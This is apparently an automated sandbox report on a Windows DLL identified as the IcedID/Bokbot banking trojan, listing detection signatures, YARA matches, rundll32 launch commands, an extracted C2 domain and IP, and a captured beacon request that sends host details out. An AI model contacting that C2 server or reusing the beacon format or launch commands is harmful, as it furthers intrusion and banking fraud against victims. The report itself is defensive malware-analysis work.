Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
y2D56.tmp.dll

Overview

General Information

Sample Name:y2D56.tmp.dll
Analysis ID:682775
MD5:363777daf36e9534762d30bd4bf22c74
SHA1:ea94d9afd355dd23a069f21b3562d85a4266da4f
SHA256:8cd135e5b49d16aceb7665b6316cd4df2e132ef503ff0af51c080bad7010efd6
Tags:BokbotDLLexeIcedID
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected IcedID
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
PE file does not import any functions
Yara signature match
PE file contains an invalid checksum
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers

Classification

  • System is w10x64
  • loaddll64.exe (PID: 3960 cmdline: loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 1944 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 2700 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4956 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2264 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4040 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5672 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5652 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3976 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3516 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3568 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
    00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_11d24d35unknownunknown
    • 0x3d0:$a2: loader_dll_64.dll
    00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_0b62e783unknownunknown
    • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
    00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_91562d18unknownunknown
    • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_48029e37unknownunknown
    • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    Click to see the 8 entries
    SourceRuleDescriptionAuthorStrings
    3.2.rundll32.exe.212802e97b8.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x1bd0:$internal_name: loader_dll_64.dll
    • 0x1f08:$string6: WINHTTP.dll
    • 0x1bf4:$string7: DllRegisterServer
    • 0x1c06:$string8: PluginInit
    3.2.rundll32.exe.212802e97b8.1.unpackWindows_Trojan_IcedID_11d24d35unknownunknown
    • 0x1bd0:$a2: loader_dll_64.dll
    3.2.rundll32.exe.212802e97b8.1.unpackWindows_Trojan_IcedID_91562d18unknownunknown
    • 0x13c4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    3.2.rundll32.exe.212802e97b8.1.unpackWindows_Trojan_IcedID_48029e37unknownunknown
    • 0x990:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    3.2.rundll32.exe.180000000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    Click to see the 14 entries
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: y2D56.tmp.dllAvira: detected
    Source: y2D56.tmp.dllVirustotal: Detection: 14%Perma Link
    Source: alexbionka.comAvira URL Cloud: Label: malware
    Source: http://alexbionka.com/QpkOAvira URL Cloud: Label: malware
    Source: http://alexbionka.com/Avira URL Cloud: Label: malware
    Source: http://alexbionka.com/UNAvira URL Cloud: Label: malware
    Source: http://alexbionka.com:80/hAvira URL Cloud: Label: malware
    Source: alexbionka.comVirustotal: Detection: 9%Perma Link
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
    Source: y2D56.tmp.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

    Networking

    barindex
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    Source: Malware configuration extractorURLs: alexbionka.com
    Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876Host: alexbionka.com
    Source: Joe Sandbox ViewIP Address: 64.227.108.27 64.227.108.27
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 22:28:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
    Source: rundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/QpkO
    Source: rundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/UN
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com:80/h
    Source: unknownDNS traffic detected: queries for: alexbionka.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876Host: alexbionka.com

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE

    System Summary

    barindex
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: y2D56.tmp.dllStatic PE information: No import functions for PE file found
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024FC
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C55FE6 NtCreateSection,NtMapViewOfSection,
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C55FF9 NtCreateSection,
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: y2D56.tmp.dllVirustotal: Detection: 14%
    Source: y2D56.tmp.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj
